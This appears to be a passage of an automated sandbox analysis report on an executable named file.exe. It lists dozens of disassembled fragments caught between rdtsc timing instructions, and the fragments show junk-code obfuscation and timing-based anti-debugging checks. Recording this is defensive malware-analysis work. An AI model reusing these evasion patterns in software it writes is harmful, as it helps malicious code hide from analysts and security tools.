    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3366 second address: 3B3370 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B24DD second address: 3B24E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B24E3 second address: 3B24E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B342E second address: 3B3432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B24E8 second address: 3B24EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3432 second address: 3B343C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F18F0EA3E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B24EE second address: 3B250C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F18F0E36A53h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B44C5 second address: 3B44C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B54AA second address: 3B54AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8B73 second address: 3B8BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bx, cx 0x0000000c mov edi, esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F18F0EA3E48h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12464F8Ah], edi 0x00000030 mov dword ptr [ebp+12453857h], eax 0x00000036 mov edi, dword ptr [ebp+12465D57h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F18F0EA3E48h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Dh 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007F18F0EA3E4Ch 0x00000061 jnc 00007F18F0EA3E46h 0x00000067 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBBF6 second address: 3BBC1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F18F0E36A4Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBC1A second address: 3BBC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBC22 second address: 3BBCAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F18F0E36A48h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 sub ebx, 42E89000h 0x0000002c push 00000000h 0x0000002e movsx ebx, cx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F18F0E36A48h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d mov edi, ecx 0x0000004f mov bx, C41Fh 0x00000053 xchg eax, esi 0x00000054 jmp 00007F18F0E36A58h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jo 00007F18F0E36A46h 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBCAB second address: 3BBCAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B56DD second address: 3B56E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B7E67 second address: 3B7E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F18F0EA3E46h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8D41 second address: 3B8D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F18F0E36A4Dh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B368E second address: 3B3698 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F18F0EA3E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BAD97 second address: 3BADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBCAF second address: 3BBCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3698 second address: 3B369E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BAE8A second address: 3BAE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BD587 second address: 3BD58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BD58E second address: 3BD594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBED8 second address: 3BBEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBEDD second address: 3BBEFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a ja 00007F18F0EA3E53h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C3E16 second address: 3C3E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C3E1B second address: 3C3E3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E57h 0x00000007 je 00007F18F0EA3E57h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357B66 second address: 357B6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357B6B second address: 357B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357B71 second address: 357B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357B80 second address: 357B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 357B84 second address: 357B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C35EC second address: 3C360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0EA3E57h 0x00000009 jnp 00007F18F0EA3E46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C3885 second address: 3C3892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C3892 second address: 3C3898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C3898 second address: 3C389C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7CB6 second address: 3C7CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7CBC second address: 3C7CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7CC0 second address: 3C7CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7CC6 second address: 3C7CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F18F0E36A4Eh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35CC40 second address: 35CC65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F18F0EA3E46h 0x00000010 jo 00007F18F0EA3E46h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C86B0 second address: 3C86BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F18F0E36A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C86BA second address: 3C86CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F18F0EA3E4Ch 0x0000000f jnp 00007F18F0EA3E46h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C86CF second address: 3C8707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F18F0E36A58h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jnl 00007F18F0E36A5Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C8983 second address: 3C898E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C898E second address: 3C89AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F18F0E36A4Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C89AD second address: 3C89B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF2C4 second address: 3CF2E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F18F0E36A4Bh 0x00000008 jg 00007F18F0E36A46h 0x0000000e popad 0x0000000f jnp 00007F18F0E36A4Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF2E1 second address: 3CF2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF2EB second address: 3CF32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A53h 0x00000009 jmp 00007F18F0E36A52h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F18F0E36A46h 0x00000017 jmp 00007F18F0E36A4Eh 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE583 second address: 3CE591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jns 00007F18F0EA3E46h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE591 second address: 3CE59A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE696 second address: 3CE6B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F18F0EA3E53h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE6B0 second address: 3CE6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE80F second address: 3CE815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE815 second address: 3CE843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F18F0E36A48h 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F18F0E36A46h 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F18F0E36A46h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 jc 00007F18F0E36A4Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE843 second address: 3CE847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAFC second address: 3CEB25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F18F0E36A4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEB25 second address: 3CEB42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEB42 second address: 3CEB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEC9D second address: 3CECAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CECAF second address: 3CECB9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF103 second address: 3CF107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF107 second address: 3CF111 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F18F0E36A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF111 second address: 3CF139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F18F0EA3E57h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D2665 second address: 3D2673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A4Ah 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D2673 second address: 3D269C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E51h 0x00000007 jmp 00007F18F0EA3E51h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D269C second address: 3D26A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D26A2 second address: 3D26BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F18F0EA3E46h 0x0000000a jnc 00007F18F0EA3E46h 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F18F0EA3E46h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D26BD second address: 3D26C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D26C1 second address: 3D26C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D26C7 second address: 3D26D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D26D3 second address: 3D26D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7FF3 second address: 3D8007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c jnc 00007F18F0E36A4Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D8007 second address: 3D8020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F18F0EA3E50h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D8020 second address: 3D802A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F18F0E36A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D802A second address: 3D8030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D8030 second address: 3D8059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F18F0E36A53h 0x00000008 jmp 00007F18F0E36A51h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D8059 second address: 3D8062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D8062 second address: 3D8068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D6C77 second address: 3D6C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0EA3E59h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7115 second address: 3D711F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F18F0E36A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D711F second address: 3D7125 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7125 second address: 3D712B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D712B second address: 3D716E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F18F0EA3E56h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jno 00007F18F0EA3E46h 0x00000017 popad 0x00000018 jmp 00007F18F0EA3E4Ch 0x0000001d push esi 0x0000001e jng 00007F18F0EA3E46h 0x00000024 push eax 0x00000025 pop eax 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D716E second address: 3D7172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D72B7 second address: 3D72D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F18F0EA3E57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D72D3 second address: 3D72DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D73F9 second address: 3D7429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E58h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F18F0EA3E52h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
